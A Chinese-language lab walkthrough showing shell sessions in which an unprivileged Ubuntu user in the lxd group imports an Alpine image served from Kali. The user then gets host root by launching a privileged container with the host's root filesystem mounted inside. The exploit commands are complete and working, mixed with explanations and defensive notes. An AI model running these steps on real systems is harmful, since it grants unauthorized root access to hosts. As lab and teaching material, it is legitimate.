Ubuntu
root安装lxd、lxc、lxc-templates 以及 zfsutils-linux
cps@ubuntu:~$ sudo su root
root@ubuntu:/home/cps# apt install lxd lxc lxc-templates
E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?
root@ubuntu:/home/cps# cd Desktop/
root@ubuntu:/home/cps/Desktop# ll
total 12
drwxr-xr-x 2 cps cps 4096 5月 5 12:59 ./
drwxr-xr-x 15 cps cps 4096 5月 5 12:57 ../
-rw------- 1 cps cps 150 5月 4 18:22 lock.sh
root@ubuntu:/home/cps/Desktop# chmod 777 lock.sh
（注意：777 会让脚本对所有本地用户可写，而它紧接着以 root 身份执行，任何本地用户都可以借此改写脚本获得 root；只需要 chmod u+x（或 700）即可，且以 root 运行前应先 cat 检查脚本内容。）
root@ubuntu:/home/cps/Desktop# ./lock.sh
Hit:1 http://security.ubuntu.com/ubuntu bionic-security InRelease
Hit:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Reading package lists... Done
Building dependency tree
Reading state information... Done
319 packages can be upgraded. Run 'apt list --upgradable' to see them.
root@ubuntu:/home/cps/Desktop# apt install lxd lxc lxc-templates
root@ubuntu:/home/cps/Desktop# apt install zfsutils-linux
创建一个普通账户 aaa 并添加到 lxd 组（注意：lxd 组成员可以创建特权容器并挂载宿主机根目录，实际上等价于 root 权限，生产环境只应授予可信的管理员；追加附加组应使用 `usermod -aG lxd aaa`，不带 `-a` 的 `-G` 会覆盖用户原有的全部附加组，这里 aaa 没有其他组所以没有影响。）
root@ubuntu:/home/cps# useradd aaa
root@ubuntu:/home/cps# passwd aaa
Enter new UNIX password: 111111
Retype new UNIX password: 111111
passwd: password updated successfully
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# cat /etc/group | grep aaa
aaa:x:1001:
root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# cat /etc/group | grep aaa
lxd:x:127:cps,aaa
aaa:x:1001:
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps#
lxd初始化
root@ubuntu:/home/cps# lxd init
选项[default=zfs] ,这里改选dir,其他回车默认
lxc启动容器
本地如果没有ubuntu,会自动下载,时间比较久
root@ubuntu:/home/cps# lxc launch ubuntu
To start your first container, try: lxc launch ubuntu:18.04
Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Retrieving image: rootfs: 2% (101.99kB/s)
list查看容器
root@ubuntu:/home/cps# lxc launch ubuntu
Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Container name is: fun-mustang
Starting fun-mustang
root@ubuntu:/home/cps# lxc list
Kali
在 Kali 上克隆 lxd-alpine-builder 并用 build-alpine 构建 Alpine 镜像（这里以 root 运行；脚本会从 Alpine 镜像源下载 rootfs，产物是一个单文件 tar.gz）
┌──(root㉿kali)-[~]
└─# ping www.baidu.com
PING www.a.shifen.com (183.2.172.42) 56(84) bytes of data.
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=1 ttl=128 time=39.3 ms
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=2 ttl=128 time=49.5 ms
^Z
zsh: suspended ping www.baidu.com
┌──(root㉿kali)-[~]
└─# git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 90.00 KiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(root㉿kali)-[~]
└─# cd lxd-alpine-builder
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# ./build-alpine
开启 HTTP 服务
将文件 alpine-v3.13-x86_64-20210218_0139.tar.gz 移动到桌面 /Desktop，并在 /Desktop 目录下开启 HTTP 服务。
（注意：http.server 只会提供当前工作目录下的文件，下面的提示符显示服务实际是在 ~/lxd-alpine-builder 下启动的，镜像文件必须在启动服务的那个目录里；另外它监听在 0.0.0.0:8000，整个局域网都能访问该目录，下载完成后应及时 Ctrl-C 关闭。）
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# cd ..
┌──(root㉿kali)-[~]
└─# cd Desktop
┌──(root㉿kali)-[~/Desktop]
└─# python -m SimpleHTTPServer
/usr/bin/python: No module named SimpleHTTPServer
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
ip信息
┌──(root㉿kali)-[~]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host proto kernel_lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:fa:4e:d4 brd ff:ff:ff:ff:ff:ff
inet 192.168.196.3/24 brd 192.168.196.255 scope global dynamic noprefixroute eth0
valid_lft 942sec preferred_lft 942sec
inet6 fe80::20c:29ff:fefa:4ed4/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(root㉿kali)-[~]
└─#
Ubuntu
Error!! aaa 无法登录图形化界面
原因：前面用 `useradd aaa` 时没有加 `-m`，没有为用户创建家目录（也没有指定登录 shell），所以图形登录失败。处理：删除 aaa，改用交互式的 `adduser` 重新创建（它会自动创建 /home/aaa 并复制 /etc/skel），然后再次把用户加入 lxd 组（userdel 之后组成员关系也随之丢失，需要重新 usermod）。
cps@ubuntu:~$ sudo su root
[sudo] password for cps:
root@ubuntu:/home/cps# userdel aaa
root@ubuntu:/home/cps# adduser aaa
Adding user `aaa' ...
Adding new group `aaa' (1001) ...
Adding new user `aaa' (1001) with group `aaa' ...
Creating home directory `/home/aaa' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for aaa
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@ubuntu:/home/cps#
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps# su aaa
aaa@ubuntu:/home/cps$
aaa 切换到 /tmp 目录，下载 tar.gz 包
（注意：镜像是通过明文 HTTP 传输的，没有任何完整性校验；建议先在 Kali 上 `sha256sum` 该 tarball，导入后与下面 `lxc image import` 打印的 fingerprint 比对——单文件镜像的指纹就是该 tarball 的 sha256。）
将镜像添加到 lxd 并查看
aaa@ubuntu:/tmp$ ll alpine-v3.13-x86_64-20210218_0139.tar.gz
-rw-rw-r-- 1 aaa aaa 3259593 5月 5 15:39 alpine-v3.13-x86_64-20210218_0139.tar.gz
aaa@ubuntu:/tmp$ lxc image import /tmp/alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
aaa@ubuntu:/tmp$ lxc image list
普通用户aaa提权
root新建file
root@ubuntu:~/snap# cd /root/
root@ubuntu:~# touch testaaa.txt
root@ubuntu:~# vi testaaa.txt
root@ubuntu:~# cat testaaa.txt
root can see
root@ubuntu:~# ls
snap testaaa.txt
root@ubuntu:~#
aaa无权访问
aaa@ubuntu:~$ cd /root/
bash: cd: /root/: Permission denied
aaa@ubuntu:~$
利用 lxc 提权：security.privileged=true 让容器内的 uid 0 不经过用户命名空间映射，直接对应宿主机的 root；再把宿主机的 / 作为 disk 设备挂载到容器内的 /mnt/root，容器内的 root 就能读写宿主机的全部文件。
aaa@ubuntu:~$ lxc init myimage aaa -c security.privileged=true
Creating aaa
aaa@ubuntu:~$ lxc config device add aaa mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to aaa
aaa@ubuntu:~$ lxc start aaa
- lxc init 用 myimage（也就是上面导入的 Alpine 镜像）初始化一个名为 aaa 的容器（aaa 这里是容器名，不是账户名），-c security.privileged=true 把它配置为特权容器：容器内 root 直接映射为宿主机 root，而不是非特权容器里的高位 uid
- lxc config device add 给容器 aaa 添加一个名为 mydevice 的 disk 设备，source=/ 把宿主机根目录挂载到容器内 path 指定的 /mnt/root，recursive=true 表示递归绑定挂载（宿主机 / 下已有的子挂载点也一并带入容器）
- lxc start 启动刚刚创建的容器 aaa
- lxc exec aaa /bin/sh 在容器 aaa 内以容器 root 执行 sh（在特权容器里即宿主机 root）
提权测试：在容器内以 root 身份通过 /mnt/root/root/testaaa.txt 读到了宿主机 /root 下的文件，证明已获得宿主机 root 等价权限（disk 设备默认没有设置 readonly=true，因此写操作同样可行）。防御要点：把 lxd 组成员资格视同 sudo 权限，只授予可信用户。
aaa@ubuntu:~$ lxc exec aaa /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
~ # pwd
/root
~ # cd /mnt/
/mnt # cd root/
/mnt/root # pwd
/mnt/root
/mnt/root # cd ./root/
/mnt/root/root # ls
snap testaaa.txt
/mnt/root/root # cat testaaa.txt
root can see
/mnt/root/root